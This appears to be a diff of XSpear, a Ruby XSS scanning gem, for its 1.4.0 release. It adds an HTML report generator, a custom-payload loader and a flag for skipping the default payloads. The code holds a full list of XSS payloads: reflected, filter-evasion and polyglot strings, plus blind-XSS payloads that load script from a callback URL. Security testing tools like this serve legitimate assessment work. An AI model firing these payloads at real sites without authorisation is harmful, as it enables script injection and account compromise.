+ t_issue = t_issue + "<tr class='#{i[1]} ISSUE'><td>#{i[0]}</td><td>#{i[1]}</td><td>#{CGI.escapeHTML i[2]}</td><td>#{i[3]}</td><td>#{CGI.escapeHTML i[4]}</td><td>#{CGI.escapeHTML i[5]}</td><td>#{CGI.escapeHTML i[6]}</td></tr>" #(i[0],i[1],i[2],i[3],i[4],i[5],i[6])
82
+ end
83
+ @filtered_objects.each do |key, value|
84
+ begin
85
+ eh = []
86
+ tag = []
87
+ sc = []
88
+ uc = []
89
+ t_available = t_available + "<code>#{key}</code> param<br>"
90
+ value.each do |n|
91
+ if n.include? "=64"
92
+ # eh
93
+ eh.push n.chomp("=64")
94
+ elsif n.include? "xsp<"
95
+ # tag
96
+ n = n.sub("xsp<","")
97
+ tag.push n.chomp(">")
98
+ elsif n.include? ".xspear"
99
+ # uc
100
+ uc.push n.sub(".xspear","")
101
+ else
102
+ # sc
103
+ sc.push n.sub("XsPeaR","")
104
+ end
105
+ end
106
+ as = ""#sc.map(&:inspect).join(',')
107
+ ae = ""#eh.map(&:inspect).join(',')
108
+ at = ""#tag.map(&:inspect).join(',')
109
+ ac = ""#uc.map(&:inspect).join(',')
110
+
111
+ sc.each do |z|
112
+ as = as + "<code>#{CGI.escapeHTML z}</code> "
113
+ end
114
+ eh.each do |z|
115
+ ae = ae + "<code>#{CGI.escapeHTML z}</code> "
116
+ end
117
+ tag.each do |z|
118
+ at = at + "<code>#{CGI.escapeHTML z}</code> "
119
+ end
120
+ uc.each do |z|
121
+ ac = ac + "<code>#{CGI.escapeHTML z}</code> "
122
+ end
123
+
124
+ t_available = t_available + """
125
+ <table>
126
+ <tr>
127
+ <td width='50%'>
128
+ <table>
129
+ <tr>
130
+ <td>Category</td>
131
+ <td>Data</td>
132
+ </tr>
133
+ <tr><td style='width:150px;'>HTML Tag</td><td>#{at}</td></tr>
134
+ <tr><td style='width:150px;'>Useful Code</td><td>#{ac}</td></tr>
135
+ <tr><td style='width:150px;'>Special Char</td><td>#{as}</td></tr>
136
+
137
+ </table>
138
+ </td>
139
+ <td><table>
140
+ <tr>
141
+ <td>Category</td>
142
+ <td>Data</td>
143
+ <tr><td style='width:150px;'>Event Handler</td><td>#{ae}</td></tr>
144
+ </tr>
145
+
146
+ </table>
147
+ </td>
148
+ </tr>
149
+ </table>
150
+ """
151
+ rescue
152
+ end
153
+ end
154
+ if @filtered_objects.length == 0
155
+ end
156
+ begin
157
+ @query.each_with_index do |q, i|
158
+ html_q = "#{@url.sub(URI.parse(@url).query,"")}"+q
159
+ t_rawquery = t_rawquery + "<li><a href='#{CGI.escapeHTML html_q}'>[#{i}] #{CGI.escapeHTML html_q}</a></li>"
160
+ end
161
+ rescue
162
+ end
163
+ report = """
164
+ <style>
165
+ @import url(https://fonts.googleapis.com/css?family=Lato:100,300,400,700);
166
+ @import url(https://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css);
167
+
168
+ html {
169
+ height: 100%;
170
+ font-family: 'Lato', sans-serif;
171
+ -webkit-user-select: none;
172
+ color:rgba(255, 255, 255, 0.4);
173
+ }
174
+ body {
175
+ height: 100%;
176
+ margin: 0;
177
+ background: #252C33;
178
+ }
179
+ * {
180
+ box-sizing: border-box;
181
+ word-break: keep-all;
182
+ }
183
+
184
+ ::-webkit-scrollbar {
185
+ min-width: 12px;
186
+ width: 12px;
187
+ max-width: 12px;
188
+ min-height: 12px;
189
+ height: 12px;
190
+ max-height: 12px;
191
+ background-color: #252C33;
192
+ }
193
+ ::-webkit-scrollbar-thumb {
194
+ background: rgba(255,255,255,0.1);
195
+ border: solid 3px #252C33;
196
+ border-radius: 100px;
197
+ }
198
+ ::-webkit-scrollbar-thumb:hover {
199
+ background: rgba(255,255,255,0.2);
200
+ }
201
+ ::-webkit-scrollbar-thumb:active {
202
+ background: rgba(255,255,255,0.2);
203
+ }
204
+ ::-webkit-scrollbar-button {
205
+ display: none;
206
+ height: 0px;
207
+ }
208
+
209
+ /* CONTAINER */
210
+ #container {
211
+ display: table;
212
+ width: 100%;
213
+ background: #252C33;
214
+ margin: 0px auto;
215
+ border-radius: 0px;
216
+ }
217
+
218
+ /* Side Bar */
219
+ #sideMenu {
220
+ width: 240px;
221
+ height: 100%;
222
+ padding: 30px;
223
+ border-right: 1px solid rgba(0,0,0,.1);
224
+ background: #1b232a;
225
+ display: table-cell;
226
+ vertical-align: top;
227
+ color: #fff;
228
+ }
229
+ #sideMenuFixed{
230
+ position: fixed;
231
+ top: 0px;
232
+ left: 0px;
233
+ width: 240px;
234
+ height: 100%;
235
+ padding: 30px;
236
+ border-right: 1px solid rgba(0,0,0,.1);
237
+ background: #1b232a;
238
+ z-index: 9;
239
+ }
240
+ #sidecontent{
241
+ position: fixed;
242
+ width: 200px;
243
+ z-index: 10;
244
+ }
245
+ #sidecontent h1:first-child{
246
+ color: maroon;
247
+ text-shadow: 5px 5px 0px rgba(0,0,0,.2);
248
+ font-weight: 700;
249
+ font-size: 27px;
250
+ margin-left: -8px;
251
+ }
252
+ .menu {
253
+ list-style: none;
254
+ margin: 24px 0;
255
+ padding: 0;
256
+ width: 100%;
257
+ }
258
+ .menu li {
259
+ display: block;
260
+ height: 30px;
261
+ width: 100%;
262
+ line-height: 30px;
263
+ font-size: 14px;
264
+ font-weight: 300;
265
+ color: rgba(255, 255, 255, .7);
266
+ position: relative;
267
+ cursor: pointer;
268
+ }
269
+ .menu li:hover {
270
+ color: #FFF;
271
+ }
272
+ .menu li:first-child {
273
+ height: 35px;
274
+ line-height: 35px;
275
+ font-size: 16px;
276
+ font-weight: 700;
277
+ color: #DDD;
278
+ background: rgba(0,0,0,.08);
279
+ margin-left: -18px;
280
+ padding: 0px 10px;
281
+ border-radius: 8px;
282
+ cursor: default;
283
+ }
284
+ .addCategory {
285
+ font-size: 13px;
286
+ font-weight: 200;
287
+ color: rgba(255, 255, 255, .2);
288
+ }
289
+ .addCategory:hover {
290
+ color: #fff;
291
+ }
292
+
293
+ /* Content */
294
+ #content {
295
+ width: calc(100% - 240px);
296
+ height: 100%;
297
+ padding: 25px;
298
+ display: table-cell;
299
+ }
300
+
301
+ a{
302
+ color:rgba(255, 255, 255, .8);
303
+ }
304
+
305
+ /* Table */
306
+ table {
307
+ width: 100%;
308
+ border-collapse: collapse;
309
+ }
310
+ th {
311
+ text-align: left;
312
+ color: #fff;
313
+ font-weight: 400;
314
+ font-size: 13px;
315
+ text-transform: uppercase;
316
+ border-bottom: 1px solid rgba(255, 255, 255, 0.1);
317
+ padding: 0 10px;
318
+ padding-bottom: 14px;
319
+ }
320
+ tr:not(:first-child):hover {
321
+ background: rgba(255, 255, 255, 0.03);
322
+ }
323
+ td {
324
+ height: 40px;
325
+ line-height: 40px;
326
+ font-weight: 300;
327
+ color: white;
328
+ padding: 0 10px;
329
+ vertical-align: top;
330
+ }
331
+ /* Headers */
332
+ h1 {
333
+ font-size: 13px;
334
+ font-weight: 200;
335
+ letter-spacing: 1px;
336
+ text-transform: uppercase;
337
+ margin: 0;
338
+ }
339
+ h2 {
340
+ float: left;
341
+ letter-spacing: 1px;
342
+ margin: 0;
343
+ color: white;
344
+ }
345
+ h3 {
346
+ float: left;
347
+ color: #fff;
348
+ font-size: 32px;
349
+ font-weight: 300;
350
+ margin: 0;
351
+ margin-top: 8%;
352
+ margin-left: 20px;
353
+ margin-bottom: 6px;
354
+ }
355
+ .LOW {
356
+ background-color: darkgoldenrod;
357
+ }
358
+ .MEDIUM {
359
+ background-color: sienna;
360
+ }
361
+ .HIGH {
362
+ background-color: firebrick;
363
+ }
364
+ .VULN {
365
+ background-color: maroon;
366
+ }
367
+ .ISSUE{
368
+ border: 1px solid white;
369
+ }
370
+ code {
371
+ background: black;
372
+ border: 1px solid;
373
+ padding: 3px;
374
+ border-radius: 5px;
375
+ color: white;
376
+ }
377
+ </style>
378
+ <div id='container'>
379
+ <div id='sideMenu'>
380
+ <div id='sideMenuFixed'></div>
381
+ <div id='sidecontent'>
382
+ <h1>XSPEAR</h1> v#{XSpear::VERSION}
383
+
384
+ <ul class='menu'>
385
+ <li><a href='#summary'>Report</a></li>
386
+ <li><a href='#issues'>Issues</a></li>
387
+ <li><a href='#available'>Available Objects</a></li>
388
+ <li><a href='#raw_query'>Raw Query</a></li>
389
+ </ul>
390
+ <ul class='menu'>
391
+ <li><a href='https://github.com/hahwul/XSpear'>About XSpear</a></li>
392
+ <li><a href='https://github.com/hahwul/XSpear/issues/new'>Submit Bugs</a></li>
393
+ </ul>
394
+ </div>
395
+ </div>
396
+ <div id='content'>
397
+ <h2 id=summary>Summary</h2><br><br>
398
+ #{t_info}
399
+ <br><br><h2 id=issues>Issues</h2><br>
400
+ <table>
401
+ <tr>
402
+ <td>No</td><td>Type</td><td>Issue</td><td>Method</td><td>Parameter</td><td>Payload</td><td>Description</td>
403
+ </tr>
404
+ #{t_issue}
405
+ </table>
406
+ <br><br><h2 id=available>Available Objects</h2><br><br>
407
+ #{t_available}
408
+ <br><br><h2 id=raw_query>Raw Query</h2><br><br>
409
+ #{t_rawquery}
410
+ </div>
411
+ </div>
412
+ """
413
+ return report
414
+ end
415
+
65
416
  def to_json
66
417
  buffer = []
67
418
  @issue.each do |i|
@@ -80,8 +431,6 @@ class XspearRepoter
80
431
  hash.to_json
81
432
  end
82
433
 
83
- def to_html; end
84
-
85
434
  def to_cli
86
435
  rurl = ""
87
436
  if @url.length > 66
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.3.3"
2
+ VERSION = "1.4.0"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -23,11 +23,21 @@ class XspearScan
23
23
  else
24
24
  @params = options['params'].split(",")
25
25
  end
26
+ if options['cp'].nil?
27
+ @custom_payload = nil
28
+ else
29
+ @custom_payload = File.open(options['cp'])
30
+ end
26
31
  if options['all'] == true
27
32
  @all = true
28
33
  else
29
34
  @all = false
30
35
  end
36
+ if options['nx'] == true
37
+ @nx = true
38
+ else
39
+ @nx = false
40
+ end
31
41
  @thread = options['thread']
32
42
  @output = options['output']
33
43
  @verbose = options['verbose']
@@ -485,12 +495,21 @@ class XspearScan
485
495
  end
486
496
  end.each(&:join)
487
497
  end
498
+
488
499
  if @all == true
489
500
  log('s',"used test-all-params mode(-a)")
490
- log('s',"creating a test query all param")
501
+ if @blind_url.nil?
502
+ log('s',"creating a test query all param")
503
+ else
504
+ log('s',"creating a test query all param + blind XSS")
505
+ end
491
506
  else
492
507
  log('s',"used test-reflected-params mode(default)")
493
- log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
508
+ if @blind_url.nil?
509
+ log('s',"creating a test query [for reflected #{@reflected_params.length} param ]")
510
+ else
511
+ log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
512
+ end
494
513
  end
495
514
  @param_check_switch = false
496
515
  ## [ XSS Scanning ]
@@ -520,52 +539,53 @@ class XspearScan
520
539
  end
521
540
 
522
541
 
523
- # Check Common XSS Payloads
524
- onfocus_tags = [
525
- "input",
526
- "select",
527
- "textarea",
528
- "keygen"
529
- ]
530
- r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
531
- r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
532
- r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
533
- r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
534
- r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
535
- r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
536
- r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
537
- r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
538
- r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
539
- r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
540
- r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
541
-
542
-
543
- onfocus_tags.each do |t|
544
- r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
545
- end
546
-
547
- # Check Selenium Common XSS Payloads
548
- r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
549
- r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
550
- r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
551
- r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
552
- r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
553
- r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
554
- r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
555
- r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
556
- r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
557
- # + in Javascript payloads
558
- r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
559
- r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
560
- r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
561
- r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
562
-
563
- # Check Selenium XSS Polyglot
564
- r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
565
- r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
566
- r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
542
+ if @nx != true
543
+ # Check Common XSS Payloads
544
+ onfocus_tags = [
545
+ "input",
546
+ "select",
547
+ "textarea",
548
+ "keygen"
549
+ ]
550
+ r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
551
+ r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
552
+ r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
553
+ r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
554
+ r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
555
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
556
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
557
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
558
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
559
+ r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
560
+ r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
561
+
562
+
563
+ onfocus_tags.each do |t|
564
+ r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
565
+ end
567
566
 
567
+ # Check Selenium Common XSS Payloads
568
+ r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
569
+ r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
570
+ r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
571
+ r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
572
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
573
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
574
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
575
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
576
+ r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
577
+ # + in Javascript payloads
578
+ r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
579
+ r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
580
+ r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
581
+ r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
582
+
583
+ # Check Selenium XSS Polyglot
584
+ r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
585
+ r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
586
+ r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
568
587
 
588
+ end
569
589
  # Check Blind XSS Payload
570
590
  if !@blind_url.nil?
571
591
  r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
@@ -574,6 +594,20 @@ class XspearScan
574
594
  r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
575
595
  end
576
596
 
597
+ if !@custom_payload.nil?
598
+ log('s','load custom payload')
599
+ cps = JSON.parse @custom_payload.read
600
+ cps.each do |cp|
601
+ if cp['callback'] == 'P1'
602
+ r.push makeQueryPattern('x', cp['payload'], cp['payload'], 'h', "reflected "+"Custom Payload #{cp['descript']} ".red, CallbackStringMatch)
603
+ elsif cp['callback'] == 'P2'
604
+ r.push makeQueryPattern('x', cp['payload'], 'alert(45)', 'v', "triggered ".yellow+"Custom Payload #{cp['descript']}".red, CallbackXSSSelenium)
605
+ else
606
+
607
+ end
608
+ end
609
+ log('s',"loaded and creating #{cps.length} custom payloads")
610
+ end
577
611
 
578
612
  r = r.flatten
579
613
  r = r.flatten
@@ -582,7 +616,8 @@ class XspearScan
582
616
  if @verbose.to_i == 1
583
617
  @progress_bar = ProgressBar.new(r.length)
584
618
  end
585
- threads = []
619
+
620
+
586
621
  r.each_slice(@thread) do |jobs|
587
622
  jobs.map do |node|
588
623
  Thread.new do
@@ -606,12 +641,15 @@ class XspearScan
606
641
  end.each(&:join)
607
642
  end
608
643
 
609
-
610
644
  @report.set_filtered @filtered_objects
611
645
  @report.set_endtime
612
646
  log('s', "finish scan. the report is being generated..")
613
647
  if @output == 'json'
614
648
  puts @report.to_json
649
+ elsif @output == 'html'
650
+ f = File.open 'report.html', 'w+'
651
+ f.write @report.to_html
652
+ log('s', "generate html report file. please open ./report.html file")
615
653
  else
616
654
  @report.to_cli
617
655
  end
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.3.3
4
+ version: 1.4.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2020-02-07 00:00:00.000000000 Z
11
+ date: 2020-02-12 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize
@@ -186,11 +186,12 @@ files:
186
186
  - LICENSE.txt
187
187
  - README.md
188
188
  - Rakefile
189
- - XSpear-1.3.2.gem
189
+ - XSpear-1.3.3.gem
190
190
  - XSpear.gemspec
191
191
  - bin/console
192
192
  - bin/setup
193
193
  - config.json
194
+ - custom_payload.json
194
195
  - exe/XSpear
195
196
  - forBurp/README.md
196
197
  - forBurp/otwa.sh
data/XSpear-1.3.2.gem DELETED
Binary file